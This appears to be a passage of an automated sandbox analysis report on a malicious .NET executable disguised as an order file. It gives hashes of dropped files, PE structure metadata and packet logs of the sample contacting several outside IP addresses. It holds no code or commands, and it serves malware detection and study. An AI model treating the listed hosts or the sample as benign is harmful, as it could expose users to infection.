                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                    Malicious:true
                                                    Reputation:high, very likely benign file
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1172
                                                    Entropy (8bit):5.356731422178564
                                                    Encrypted:false
                                                    SSDEEP:24:3CytZWSKco4KmZjKbmOIKod6emN1s4RPQoU99t7J0gt/NKIl9iagu:yyjWSU4xympjms4RIoU99tK8NDv
                                                    MD5:68CB8F49FDE7FC3DF6CEE19CB730C7F8
                                                    SHA1:1EC425657E358C85CA4A3A04E6525E29B59FCB16
                                                    SHA-256:5DA91A846188B8604BEE0056451D6185AA1B91646196C90699ADFF530F8BC555
                                                    SHA-512:D3FB70289E5CD0287009394E3C9485467999DB61F9AB74D16C9E6D0CF7D0A2411BF0F165EF24D5E7BB71FCAF78A84F5499600074ED2A3FE4F8AE47CF09654415
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                    Process:C:\Windows\SysWOW64\compact.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                    Category:dropped
                                                    Size (bytes):196608
                                                    Entropy (8bit):1.1239949490932863
                                                    Encrypted:false
                                                    SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                    MD5:271D5F995996735B01672CF227C81C17
                                                    SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                    SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                    SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.951448776957406
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Windows Screen Saver (13104/52) 0.07%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    File name:spec 4008670601 AZTEK Order.exe
                                                    File size:995'840 bytes
                                                    MD5:f07575dcccaa8b88972464b50b63b017
                                                    SHA1:7949418fc5d9d6fd76c1d0349fc8dce96d777e1d
                                                    SHA256:6ce9c6e014f84badeec8435e6e781fbde6946dc45b627aff3a307e4dee1f0934
                                                    SHA512:0f326c5b5cea77152e1bc83c5709d28b67a1ae33f6d65147dc41da20d5f67a021a63177a79db67fa249e63eb16c5cacaf6e84abeaf45cf88ac99db230c60638d
                                                    SSDEEP:24576:0P0ztpDRbm2mYBjMQm60rrpb3S2eDfTs:0qtd82hjo6irB5eE
                                                    TLSH:312522011AA5DB95D93A8FB99537550023F0FC6F25A1CA6E2DC270FF9871F124822FA7
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....M...............0......f........... ........@.. ....................................@................................
                                                    Icon Hash:66666667e69c310e
                                                    Entrypoint:0x4ee892
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0xDC4DDEC0 [Fri Feb 14 19:53:36 2087 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xee840 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf0000 | 0x6400 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf8000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xecb20 | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xec898 | 0xeca00 | 97b9a7c94109e3c361bd36509306f195 | False | 0.9723333085710513 | data | 7.978470618395233 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xf0000 | 0x6400 | 0x6400 | 5b15a42bc2483c7816556dfdcf80fde7 | False | 0.395546875 | data | 5.148251263674081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xf8000 | 0xc | 0x200 | 8f5910fcd13b48ec0d373c8cd8d3135e | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xf01e0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | | | 0.2701612903225806
RT_ICON | 0xf04d8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | | | 0.4966216216216216
RT_ICON | 0xf0610 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.5439765458422174
RT_ICON | 0xf14c8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.6656137184115524
RT_ICON | 0xf1d80 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.5021676300578035
RT_ICON | 0xf22f8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.3157676348547718
RT_ICON | 0xf48b0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.4090056285178236
RT_ICON | 0xf5968 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.5859929078014184
RT_GROUP_ICON | 0xf5de0 | 0x76 | data | | | 0.6440677966101694
RT_VERSION | 0xf5e68 | 0x398 | OpenPGP Public Key | | | 0.4206521739130435
RT_MANIFEST | 0xf6210 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                    Jul 3, 2024 17:51:47.247565031 CEST8049737192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:47.247581005 CEST8049737192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:47.247586012 CEST4973780192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:47.247595072 CEST8049737192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:47.247607946 CEST8049737192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:47.247627020 CEST8049737192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:47.247632027 CEST4973780192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:47.247668028 CEST4973780192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:47.256139994 CEST8049737192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:47.256210089 CEST4973780192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:47.297018051 CEST8049737192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:47.297422886 CEST8049737192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:47.297437906 CEST8049737192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:47.297486067 CEST4973780192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:47.297543049 CEST4973780192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:48.118865967 CEST4973780192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:49.123428106 CEST4973880192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:49.128643990 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.130213976 CEST4973880192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:49.132194042 CEST4973880192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:49.137547970 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.767226934 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.767318964 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.767355919 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.767410994 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.767411947 CEST4973880192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:49.767462015 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.767498016 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.767502069 CEST4973880192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:49.767532110 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.767551899 CEST4973880192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:49.767592907 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.767683029 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.767709017 CEST4973880192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:49.767720938 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.767777920 CEST4973880192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:49.772943974 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.773170948 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.773232937 CEST4973880192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:49.855851889 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.856034994 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.856046915 CEST8049738192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:49.856110096 CEST4973880192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:50.635503054 CEST4973880192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:51.654239893 CEST4973980192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:51.659070015 CEST8049739192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:51.659243107 CEST4973980192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:51.661206961 CEST4973980192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:51.666071892 CEST8049739192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:51.666187048 CEST8049739192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:52.284810066 CEST8049739192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:52.284831047 CEST8049739192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:52.284842968 CEST8049739192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:52.285006046 CEST4973980192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:52.285145998 CEST8049739192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:52.285200119 CEST8049739192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:52.285211086 CEST8049739192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:52.285223007 CEST4973980192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:52.285247087 CEST4973980192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:52.285393953 CEST8049739192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:52.285404921 CEST8049739192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:52.285415888 CEST8049739192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:52.285427094 CEST8049739192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:52.285439968 CEST4973980192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:52.285464048 CEST4973980192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:52.295702934 CEST8049739192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:52.295852900 CEST8049739192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:52.295929909 CEST4973980192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:52.375447989 CEST8049739192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:52.375509977 CEST8049739192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:52.375557899 CEST4973980192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:52.375570059 CEST8049739192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:52.375622988 CEST4973980192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:53.166738987 CEST4973980192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:54.185755014 CEST4974080192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:54.192326069 CEST8049740192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:54.192495108 CEST4974080192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:54.194305897 CEST4974080192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:54.199615955 CEST8049740192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:54.928082943 CEST8049740192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:54.928107977 CEST8049740192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:54.928303003 CEST8049740192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:51:54.928457022 CEST4974080192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:54.928555965 CEST4974080192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:54.931324959 CEST4974080192.168.2.6192.185.208.8
                                                    Jul 3, 2024 17:51:54.936268091 CEST8049740192.185.208.8192.168.2.6
                                                    Jul 3, 2024 17:52:00.563064098 CEST4974180192.168.2.6121.254.178.230
                                                    Jul 3, 2024 17:52:00.569380999 CEST8049741121.254.178.230192.168.2.6
                                                    Jul 3, 2024 17:52:00.569483042 CEST4974180192.168.2.6121.254.178.230
                                                    Jul 3, 2024 17:52:00.572144032 CEST4974180192.168.2.6121.254.178.230
                                                    Jul 3, 2024 17:52:00.579555988 CEST8049741121.254.178.230192.168.2.6
                                                    Jul 3, 2024 17:52:01.480489016 CEST8049741121.254.178.230192.168.2.6
                                                    Jul 3, 2024 17:52:01.480998993 CEST8049741121.254.178.230192.168.2.6
                                                    Jul 3, 2024 17:52:01.481386900 CEST4974180192.168.2.6121.254.178.230
                                                    Jul 3, 2024 17:52:02.076351881 CEST4974180192.168.2.6121.254.178.230
                                                    Jul 3, 2024 17:52:03.093236923 CEST4974280192.168.2.6121.254.178.230
                                                    Jul 3, 2024 17:52:03.098243952 CEST8049742121.254.178.230192.168.2.6
                                                    Jul 3, 2024 17:52:03.098325014 CEST4974280192.168.2.6121.254.178.230
                                                    Jul 3, 2024 17:52:03.100645065 CEST4974280192.168.2.6121.254.178.230
                                                    Jul 3, 2024 17:52:03.105448008 CEST8049742121.254.178.230192.168.2.6
                                                    Jul 3, 2024 17:52:04.033926010 CEST8049742121.254.178.230192.168.2.6
                                                    Jul 3, 2024 17:52:04.036937952 CEST8049742121.254.178.230192.168.2.6
                                                    Jul 3, 2024 17:52:04.042032003 CEST4974280192.168.2.6121.254.178.230
                                                    Jul 3, 2024 17:52:04.606117964 CEST4974280192.168.2.6121.254.178.230
                                                    Jul 3, 2024 17:52:05.681721926 CEST4974380192.168.2.6121.254.178.230
                                                    Jul 3, 2024 17:52:05.930227995 CEST8049743121.254.178.230192.168.2.6
                                                    Jul 3, 2024 17:52:05.930330992 CEST4974380192.168.2.6121.254.178.230
                                                    Jul 3, 2024 17:52:05.932557106 CEST4974380192.168.2.6121.254.178.230
                                                    Jul 3, 2024 17:52:05.937663078 CEST8049743121.254.178.230192.168.2.6
                                                    Jul 3, 2024 17:52:05.937676907 CEST8049743121.254.178.230192.168.2.6
                                                    Jul 3, 2024 17:52:06.848774910 CEST8049743121.254.178.230192.168.2.6
                                                    Jul 3, 2024 17:52:06.849260092 CEST8049743121.254.178.230192.168.2.6
                                                    Jul 3, 2024 17:52:06.849462032 CEST4974380192.168.2.6121.254.178.230
                                                    Jul 3, 2024 17:52:07.447983027 CEST4974380192.168.2.6121.254.178.230
                                                    Jul 3, 2024 17:52:08.478322029 CEST4974480192.168.2.6121.254.178.230
                                                    Jul 3, 2024 17:52:08.483212948 CEST8049744121.254.178.230192.168.2.6
                                                    Jul 3, 2024 17:52:08.486268044 CEST4974480192.168.2.6121.254.178.230
                                                    Jul 3, 2024 17:52:08.490236044 CEST4974480192.168.2.6121.254.178.230
                                                    Jul 3, 2024 17:52:08.495017052 CEST8049744121.254.178.230192.168.2.6
                                                    Jul 3, 2024 17:52:09.381258011 CEST8049744121.254.178.230192.168.2.6
                                                    Jul 3, 2024 17:52:09.381382942 CEST8049744121.254.178.230192.168.2.6
                                                    Jul 3, 2024 17:52:09.381459951 CEST4974480192.168.2.6121.254.178.230
                                                    Jul 3, 2024 17:52:09.384398937 CEST4974480192.168.2.6121.254.178.230
                                                    Jul 3, 2024 17:52:09.389307022 CEST8049744121.254.178.230192.168.2.6
                                                    Jul 3, 2024 17:52:14.504334927 CEST4974680192.168.2.6203.161.49.220
                                                    Jul 3, 2024 17:52:14.511123896 CEST8049746203.161.49.220192.168.2.6
                                                    Jul 3, 2024 17:52:14.511238098 CEST4974680192.168.2.6203.161.49.220
                                                    Jul 3, 2024 17:52:14.545154095 CEST4974680192.168.2.6203.161.49.220
                                                    Jul 3, 2024 17:52:14.550240040 CEST8049746203.161.49.220192.168.2.6
                                                    Jul 3, 2024 17:52:15.130449057 CEST8049746203.161.49.220192.168.2.6
                                                    Jul 3, 2024 17:52:15.130570889 CEST8049746203.161.49.220192.168.2.6
                                                    Jul 3, 2024 17:52:15.130625963 CEST4974680192.168.2.6203.161.49.220
                                                    Jul 3, 2024 17:52:16.058136940 CEST4974680192.168.2.6203.161.49.220
                                                    Jul 3, 2024 17:52:17.100670099 CEST4974780192.168.2.6203.161.49.220
                                                    Jul 3, 2024 17:52:17.105592966 CEST8049747203.161.49.220192.168.2.6
                                                    Jul 3, 2024 17:52:17.105664015 CEST4974780192.168.2.6203.161.49.220
                                                    Jul 3, 2024 17:52:17.118135929 CEST4974780192.168.2.6203.161.49.220
                                                    Jul 3, 2024 17:52:17.123044968 CEST8049747203.161.49.220192.168.2.6
                                                    Jul 3, 2024 17:52:17.701555967 CEST8049747203.161.49.220192.168.2.6
                                                    Jul 3, 2024 17:52:17.701580048 CEST8049747203.161.49.220192.168.2.6
                                                    Jul 3, 2024 17:52:17.701637983 CEST4974780192.168.2.6203.161.49.220
                                                    Jul 3, 2024 17:52:18.638128042 CEST4974780192.168.2.6203.161.49.220
                                                    Jul 3, 2024 17:52:19.654488087 CEST4974880192.168.2.6203.161.49.220
                                                    Jul 3, 2024 17:52:19.886562109 CEST8049748203.161.49.220192.168.2.6
                                                    Jul 3, 2024 17:52:19.886662960 CEST4974880192.168.2.6203.161.49.220
                                                    Jul 3, 2024 17:52:19.888699055 CEST4974880192.168.2.6203.161.49.220
                                                    Jul 3, 2024 17:52:19.893580914 CEST8049748203.161.49.220192.168.2.6
                                                    Jul 3, 2024 17:52:19.893795967 CEST8049748203.161.49.220192.168.2.6
                                                    Jul 3, 2024 17:52:20.507966042 CEST8049748203.161.49.220192.168.2.6
                                                    Jul 3, 2024 17:52:20.508091927 CEST8049748203.161.49.220192.168.2.6
                                                    Jul 3, 2024 17:52:20.508205891 CEST4974880192.168.2.6203.161.49.220
                                                    Jul 3, 2024 17:52:20.512703896 CEST8049748203.161.49.220192.168.2.6
                                                    Jul 3, 2024 17:52:20.512768030 CEST4974880192.168.2.6203.161.49.220
                                                    Jul 3, 2024 17:52:21.401109934 CEST4974880192.168.2.6203.161.49.220
                                                    Jul 3, 2024 17:52:22.420797110 CEST4974980192.168.2.6203.161.49.220
                                                    Jul 3, 2024 17:52:22.425710917 CEST8049749203.161.49.220192.168.2.6
                                                    Jul 3, 2024 17:52:22.425812006 CEST4974980192.168.2.6203.161.49.220
                                                    Jul 3, 2024 17:52:22.430128098 CEST4974980192.168.2.6203.161.49.220
                                                    Jul 3, 2024 17:52:22.439459085 CEST8049749203.161.49.220192.168.2.6
                                                    Jul 3, 2024 17:52:23.013477087 CEST8049749203.161.49.220192.168.2.6
                                                    Jul 3, 2024 17:52:23.013616085 CEST8049749203.161.49.220192.168.2.6
                                                    Jul 3, 2024 17:52:23.018253088 CEST4974980192.168.2.6203.161.49.220
                                                    Jul 3, 2024 17:52:23.020631075 CEST4974980192.168.2.6203.161.49.220
                                                    Jul 3, 2024 17:52:23.025624990 CEST8049749203.161.49.220192.168.2.6
                                                    Jul 3, 2024 17:52:28.337282896 CEST4975080192.168.2.6217.160.0.84
                                                    Jul 3, 2024 17:52:28.342221975 CEST8049750217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:28.342411041 CEST4975080192.168.2.6217.160.0.84
                                                    Jul 3, 2024 17:52:28.345102072 CEST4975080192.168.2.6217.160.0.84
                                                    Jul 3, 2024 17:52:28.350531101 CEST8049750217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:29.391721010 CEST8049750217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:29.391748905 CEST8049750217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:29.391766071 CEST8049750217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:29.391815901 CEST4975080192.168.2.6217.160.0.84
                                                    Jul 3, 2024 17:52:29.391869068 CEST8049750217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:29.391884089 CEST8049750217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:29.391906977 CEST8049750217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:29.391922951 CEST8049750217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:29.391953945 CEST4975080192.168.2.6217.160.0.84
                                                    Jul 3, 2024 17:52:29.391953945 CEST4975080192.168.2.6217.160.0.84
                                                    Jul 3, 2024 17:52:29.392400980 CEST8049750217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:29.392419100 CEST8049750217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:29.392435074 CEST8049750217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:29.392452002 CEST4975080192.168.2.6217.160.0.84
                                                    Jul 3, 2024 17:52:29.392484903 CEST4975080192.168.2.6217.160.0.84
                                                    Jul 3, 2024 17:52:29.397384882 CEST8049750217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:29.397813082 CEST8049750217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:29.397887945 CEST4975080192.168.2.6217.160.0.84
                                                    Jul 3, 2024 17:52:29.489151955 CEST8049750217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:29.489187956 CEST8049750217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:29.489203930 CEST8049750217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:29.489243031 CEST4975080192.168.2.6217.160.0.84
                                                    Jul 3, 2024 17:52:29.492854118 CEST8049750217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:29.492882013 CEST8049750217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:29.492902040 CEST8049750217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:29.492922068 CEST4975080192.168.2.6217.160.0.84
                                                    Jul 3, 2024 17:52:29.492964029 CEST4975080192.168.2.6217.160.0.84
                                                    Jul 3, 2024 17:52:29.499978065 CEST8049750217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:29.500657082 CEST8049750217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:29.500674963 CEST8049750217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:29.500700951 CEST4975080192.168.2.6217.160.0.84
                                                    Jul 3, 2024 17:52:29.500736952 CEST4975080192.168.2.6217.160.0.84
                                                    Jul 3, 2024 17:52:29.854291916 CEST4975080192.168.2.6217.160.0.84
                                                    Jul 3, 2024 17:52:30.872574091 CEST4975180192.168.2.6217.160.0.84
                                                    Jul 3, 2024 17:52:30.877580881 CEST8049751217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:30.880352974 CEST4975180192.168.2.6217.160.0.84
                                                    Jul 3, 2024 17:52:30.884514093 CEST4975180192.168.2.6217.160.0.84
                                                    Jul 3, 2024 17:52:30.889852047 CEST8049751217.160.0.84192.168.2.6
                                                    Jul 3, 2024 17:52:32.385579109 CEST4975180192.168.2.6217.160.0.84
                                                    Jul 3, 2024 17:52:32.700151920 CEST4975180192.168.2.6217.160.0.84
                                                    Jul 3, 2024 17:52:32.832146883 CEST8049751217.160.0.84192.168.2.6
